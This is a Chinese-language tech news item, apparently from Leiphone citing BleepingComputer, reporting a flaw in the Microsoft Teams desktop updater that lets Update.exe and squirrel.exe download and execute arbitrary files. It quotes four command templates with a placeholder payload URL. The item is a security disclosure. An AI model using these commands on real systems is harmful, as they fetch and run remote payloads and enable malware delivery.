Microsoft Teams 升級(jí)機(jī)制允許黑客執(zhí)行任意文件

雷鋒網(wǎng)消息，據(jù) BleepingComputer 美國(guó)時(shí)間 6 月 29 日?qǐng)?bào)道，多位安全研究人員發(fā)現(xiàn)當(dāng)前在Microsoft Teams桌面應(yīng)用中實(shí)現(xiàn)的“update”升級(jí)機(jī)制允許黑客在系統(tǒng)上下載和執(zhí)行任意文件，

研究人員表示，對(duì)易受攻擊的應(yīng)用程序使用“update”命令可以在當(dāng)前用戶的上下文中執(zhí)行任意二進(jìn)制文件。目前，研究人員已向微軟報(bào)告了這個(gè)問題。

使用Microsoft Teams，將有效負(fù)載添加到其文件夾中，并使用以下任一命令自動(dòng)執(zhí)行：

Update.exe --update [url to payload]

squirrel.exe --update [url to payload]

這些命令可以與其他參數(shù)一起使用，包括“download”，它允許從遠(yuǎn)程位置以NuGet包的形式檢索有效負(fù)載。

Update.exe --download [url to payload]

squirrel.exe --download [url to payload]

相同的方法適用于“squirrel.exe”，它也是Microsoft Teams安裝包的一部分。這兩個(gè)可執(zhí)行文件現(xiàn)在都是GitHub上的Living Off The Land Binaries and Scripts（LOLBAS）數(shù)據(jù)庫(kù)的一部分。

安全研究員 Reegun Richard 在 6 月 4 日向微軟團(tuán)隊(duì)報(bào)告了這個(gè)問題。此時(shí)，應(yīng)用程序仍然容易受到攻擊，因?yàn)槲④浲ㄖ芯繂T該修復(fù)程序?qū)⒃谖磥淼能浖姹局谐霈F(xiàn)。

來源：BleepingComputer 。

雷峰網(wǎng)版權(quán)文章，未經(jīng)授權(quán)禁止轉(zhuǎn)載。詳情見轉(zhuǎn)載須知。